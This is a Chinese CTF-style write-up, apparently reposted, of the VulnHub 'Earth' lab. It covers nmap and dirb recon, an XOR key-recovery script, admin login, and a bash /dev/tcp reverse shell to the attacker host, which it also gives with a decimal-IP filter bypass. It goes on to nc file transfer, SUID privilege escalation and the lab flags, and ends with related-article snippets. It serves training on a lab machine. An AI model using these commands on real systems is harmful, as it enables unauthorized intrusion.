靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH

前期准备:

靶机下载链接: https://pan.baidu.com/s/1_w8OZOPVsQaojq2rnKcdRA 提取码: gguw

kali攻击机ip:192.168.101.10

靶机地址:192.168.101.101

一、信息收集

1.nmap扫描

因为kali与靶机在同一个网段下,使用nmap 192.168.101.0/24 扫描靶机及端口

2.使用nmap -A 192.168.101.101,发现443端口有DNS解析,在hosts文件中添加DNS解析:

使用sudo vim /etc/hosts添加两个hosts文件

3.收集earth.local信息

发现有Previous Messages

Previous Messages:

    37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40

    3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45

    2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

使用命令dirb https://earth.local扫描一下目录,发现 https://earth.local/admin 目录

进去发现是个登录界面

4.收集terratest.earth.local信息

使用命令dirb https:// terratest.earth.local扫描一下目录,发现有robots.txt文件,去查看一下

进入https://terratest.earth.local/robots.txt后,发现有个testingnotes文件,但是不知道是哪种格式

手动测试后发现是txt格式,访问testingnotes.txt

译文:

测试安全消息系统注意事项:

*使用XOR加密作为算法,在RSA中使用应该是安全的。

*地球已确认他们已收到我们发送的信息。

*testdata.txt 用于测试加密。

*terra 用作管理门户的用户名。

去做:

*我们如何安全地将每月的密钥发送到地球? 或者我们应该每周更换钥匙?

*需要测试不同的密钥长度以防止暴力破解。 钥匙应该多长时间?

*需要改进消息界面和管理面板的界面,目前非常基础。

这里我们得到了新的信息,加密算法是 XOR,并且有一个testdata.txt文档用于测试加密,用户名是terra,先访问testdata.txt并保存:

二、漏洞攻击

1.破解密码

写个简单py脚本,选一个Previous Messages数据,然后与 testdata.txt 进行一下 XOR 运算,得到密钥

Py脚本:

import binascii

data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"

f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()

print(hex(int(data1,16) ^ int(f,16)))

运行后得到以下数据

0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

十六进制转文本解码一下:

密码是重复的,然后使用用户名 terra ,密码:earthclimatechangebad4humans 登录 https://earth.local/admin

2.发现user_flag

发现可以执行系统命令:

使用find命令查找flag:

发现/var/earth_web/user_flag.txt文件,查看一下:

发现flag [user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

3.使用反弹shell连接到靶机

接下来编写个反弹shell:

bash -i >& /dev/tcp/192.168.101.10/1234 0>&1

发现禁止远程连接,发现需要对IP进行进制绕过:

bash -i >& /dev/tcp/3232261386/1234 0>&1

三、提权

查找有权限的命令:

find / -perm -u=s -type f 2>/dev/null

发现有个/usr/bin/ ,感觉可以提权,查看它,运行一下reset_root:

发现报错

检查是否存在重置触发器...

重置失败,所有触发器都不存在。

本地没有调试的命令,使用nc传送到本地调试一下

nc -nlvp 1234 >reset_root

nc 192.168.101.10 1234 < /usr/bin/reset_root

用strace检测问题,要注意给文件加权限命令为chmod +x ,因为没有以下三个文件而报错,查看靶机发现也没有这三个文件:

在靶机中创建这三个文件:

然后再靶机中尝试运行reset_root:

取得root权限,查找flag:

find / -name "*flag*.txt"

cat /root/root_flag.txt

cat /var/earth_web/user_flag.txt

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/375081.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

测试与封装5.1

我的队友是52吴舒婷&#xff0c;博客内容主要是白盒黑盒的测试数据分析 我们通过简单的四则运算来进行程序的测试与封装 我们主要完成的是事情 &#xff08;1&#xff09;封装&#xff1a;将运算要运用的方法进行封装 文件主要有三个&#xff1a;Calculate&#xff08;存放运算…

springmvc学习笔记--mybatis--使用插件自动生成实体和mapper

由于表对象在开发过程中会增删字段&#xff0c;有时候需要重新生成实体和对应的mapper&#xff0c;这时候可以通过mybatis的插件的生成。 优点是快速简洁&#xff0c;缺点同样很明显&#xff1a;覆盖。因此&#xff0c;通常是在第一次搭建框架的时候使用&#xff0c;因为开发过…

靶场练习第三天~vulnhub靶场之narak

靶机下载链接: https://pan.baidu.com/s/1GxcSL6efwd0GcbY45WsD0A 提取码: dhr5 一、信息收集 1.使用namp 192.168.101.0/24扫描该网段的地址&#xff0c;寻找靶机IP 2.直接访问192.168.101.102 3.进行目录扫描&#xff0c;dirb目录扫描工具&#xff08;kali自带的&#xff…

靶场练习第四天~vulnhub靶场之Lazysysadmin

靶机下载链接: https://pan.baidu.com/s/1MMkgaYLRc78YX4s6nvqdjQ 提取码: djpm 信息收集 查看kali的IP 使用nmap 192.168.101.0/24 探测靶机IP 发现开放445端口&#xff0c;并且开放的服务microsoft-ds。可以用enum4linux工具来扫描共享文件&#xff0c;使用方法: enum4linux…

关于代码手写UI,xib和StoryBoard

代码手写UI 这种方法经常被学院派的极客或者依赖多人合作的大型项目大规模使用。Geek们喜欢用代码构建UI&#xff0c;是因为代码是键盘敲出来的&#xff0c;这样可以做到不开IB&#xff0c;手不离开键盘就完成工作&#xff0c;可以专注于编码环境&#xff0c;看起来很cool很高效…

靶场练习第五天~vulnhub靶场之basic_pentesting_1

一、信息收集 1.主机发现 靶机下载链接: https://pan.baidu.com/s/143q3cbZG6-8y8kMk51Lc_Q 提取码: i8hv &#xff08;1&#xff09;Netdiscover&#xff1a;专用的二层发现工具&#xff0c;拥有主动和被动发现两种方式 具体操作如下&#xff0c;查看一下kali的ip 然后使用…

计算机网络学习笔记(二) 计算机网络结构

什么是网络结构&#xff1f; n 网络边缘: 主机网络应用 n 接入网络&#xff0c;物理介质:有线或无线通信链路 n 网络核心&#xff08; 核心网络&#xff09; :互联的路由器&#xff08;或分组转发设备&#xff09;网络之网…

Javascript常用的设计模式详解

Javascript常用的设计模式详解 阅读目录 一&#xff1a;理解工厂模式二&#xff1a;理解单体模式三&#xff1a;理解模块模式四&#xff1a;理解代理模式五&#xff1a;理解职责链模式六&#xff1a;命令模式的理解&#xff1a;七&#xff1a;模板方法模式八&#xff1a;理解ja…

靶场练习第六天~vulnhub靶场之Lampiao

靶机下载链接: https://pan.baidu.com/s/1h0uiwvBkX8iXFyMAO23e1A 提取码: 2kjp 一、信息收集 1.靶机发现 &#xff08;1&#xff09;靶机lampiao与kali均为NAT模式 ,Kali的 IP为192.168.101.10, 扫描网段用命令nmap -sp192.168.101.0/24&#xff0c;发现靶机ip为192.168.10…

内存泄露从入门到精通三部曲之排查方法篇

最原始的内存泄露测试 重复多次操作关键的可疑的路径&#xff0c;从内存监控工具中观察内存曲线&#xff0c;是否存在不断上升的趋势且不会在程序返回时明显回落。这种方式可以发现最基本&#xff0c;也是最明显的内存泄露问题&#xff0c;对用户价值最大&#xff0c;操作难度小…

靶场练习第七天~vulnhub靶场之mrRobot

靶机下载链接: 百度网盘 请输入提取码 提取码: sqv3 一、主机发现 1.用ifconfig查看kali的ip&#xff0c;因为kali和靶机都开启了NAT模式&#xff0c;使用namp -sP 192.168.101.0/24探测靶机ip 二、信息收集 1.使用nmap扫描靶机 使用nmap -A 192.168.101.108 &#xff0c;查…

JAVA第二次试验

北京电子科技学院&#xff08;BESTI&#xff09; 实 验 报 告 课程&#xff1a;Java程序设计 班级&#xff1a;1352 姓名&#xff1a;潘俊洋 学号&#xff1a;20135230 成绩&#xff1a; 指导教师:娄嘉鹏 实验日期:2015.5.4 实验密级&#xff1a…

靶场练习第八天~vulnhub靶场之CH4INRULZ_v1.0.1

一、前期准备 1.靶机下载 链接: 百度网盘 请输入提取码 提取码: z37y 2.用命令ifconfig查看kali 二、信息收集 1.主机发现&#xff0c;使用nmap命令 具体使用方法&#xff1a;nmap -sP 192.168.101.0/24 2.查看该靶机开放了哪些端口 nmap -A 192.168.101.109 直接访问80端…

TImus 1073 Square Country DP

题意&#xff1a;给出一个数n(1<n<60000),这个数可以写成一些数的平方的和&#xff0c; 问对于n&#xff0c;最少可以分成多少个数的平方的和。 比如&#xff1a;n344&#xff0c;则34418*184*42*2&#xff0c;输出3. dp[i]表示i这个数最少可以分成多少个数的平方的和。 …

vulnhub靶机获取不到ip

1.启动靶机&#xff0c;出现如下图所示&#xff0c;按e 2.进入如下图所示时&#xff0c;将ro 替换为 rw signie init/bin/bash 3.按下Ctrl键X键&#xff0c;重启服务进入如下界面 4.查看当前网卡IP信息 ip a 5.编辑网卡配置文件vi /etc/network/interfaces 6.发现网卡名字与刚…

apache整合tomcat部署集群

近日&#xff0c;由于公司项目需要&#xff0c;所以学习了apache整合tomcat以及集群的一些知识。 所以做下笔记日后回顾可以用到。 apache只有处理静态事物的能力&#xff0c; 而tomcat的强项就是处理动态的请求&#xff0c;所以apache和tomcat整合相互取长补短&#xff0c;由a…

靶场练习第九天~vulnhub靶场之dc-1

一、环境搭建 靶场下载链接: 百度网盘 请输入提取码 提取码: ih67 1.查看kali的ip&#xff1a;ifconfig 二、信息收集 1.使用namp命令 主机探测: nmap -sP 192.168.101.0/24 查看靶机开放端口号和服务:nmap -A 192.168.101.111 发现开放80端口,访问一下192.168.101.111 Dru…

靶场练习第十天~vulnhub靶场之dc-2

一、准备工作 靶机下载地址链接: 百度网盘 请输入提取码 提取码: ib86 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;使用nmap 192.168.101.0/24&#xff0c;发现靶机地址为192.168.101.115 &#xff08;2&#xff09;对靶机做进一步探测&#xff0c;发现靶机开…

Ubuntu 14.10 创建虚拟网卡实现桥接网络

目标需求&#xff1a;在Ubuntu主机创建一张虚拟网卡&#xff0c;使得搭建在VirtualBox中的其他主机能借助虚拟网卡构建的局域网进行相互间的通讯 步骤一&#xff1a;准备工具包 安装 uml-utilities 以及 bridge-utils sudo apt-get install uml-utilities bridge-utils 步骤二&…

靶场练习第十一天~vulnhub靶场之dc-3

一、准备工作 1.靶场链接: 百度网盘 请输入提取码 提取码: 48d3 2.启动靶场后会遇到如下情况&#xff1a; 2-1具体解决办法如下&#xff1a; 启动成功 3.查看kali的ip&#xff1a;ifconfig 二、信息收集 1.nmap的信息收集 &#xff08;1&#xff09;寻找靶机的ip&#xf…